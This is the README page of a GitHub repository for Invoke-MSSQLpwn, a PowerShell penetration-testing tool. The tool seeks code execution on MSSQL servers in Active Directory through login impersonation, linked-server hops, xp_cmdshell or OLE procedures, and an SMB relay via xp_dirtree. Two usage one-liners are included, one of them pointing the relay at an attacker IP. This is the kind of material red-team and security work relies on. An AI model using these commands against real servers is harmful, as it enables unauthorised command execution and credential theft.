Skip to content

Bad-Jubies/Invoke-MSSQLpwn

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 

Repository files navigation

Invoke-MSSQLpwn

Invoke-MSSQLpwn is a PowerShell tool that attempts to gain code execution on MSSQL servers in an Active Directory environment.

Usage

Parameter Description
Enumerate This will find MSSQL service principal names within the current domain, attempt to authenticate as the current user, enumerate permissions on the server, and find linked servers.
Target Specifies the MSSQL server to be connected to
Link Specifies a linked server on the target server to connect to
Impersonate Specifies a login to be impersonated on the target server
LinkImpersonate Specifies a login to be impersonated on the linked server
Command Cmd command to be executed
Mode Specifies the how code execution is obtained. This can be set to 1 or 2. Mode 1 is the default and uses xp_cmdshell. Mode 2 uses a custom ole automation procedure
Relay Specifies the attacking server to be connected to for an SMB relay attack. This uses the xp_dirtree procedure to connect to the SMB share.
database Specifies the database to be used in the connection string. The default is master.

Examples

ExampleLink

Invoke-MSSQL -Target "MSSQL1" -Impersonate "sa" -Link "MSSQL2" -LinkImpersonate "SqlSvc" -Command "calc.exe"

dirtree

Invoke-MSSQL -Target "MSSQL1" -Relay "192.168.1.5"

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published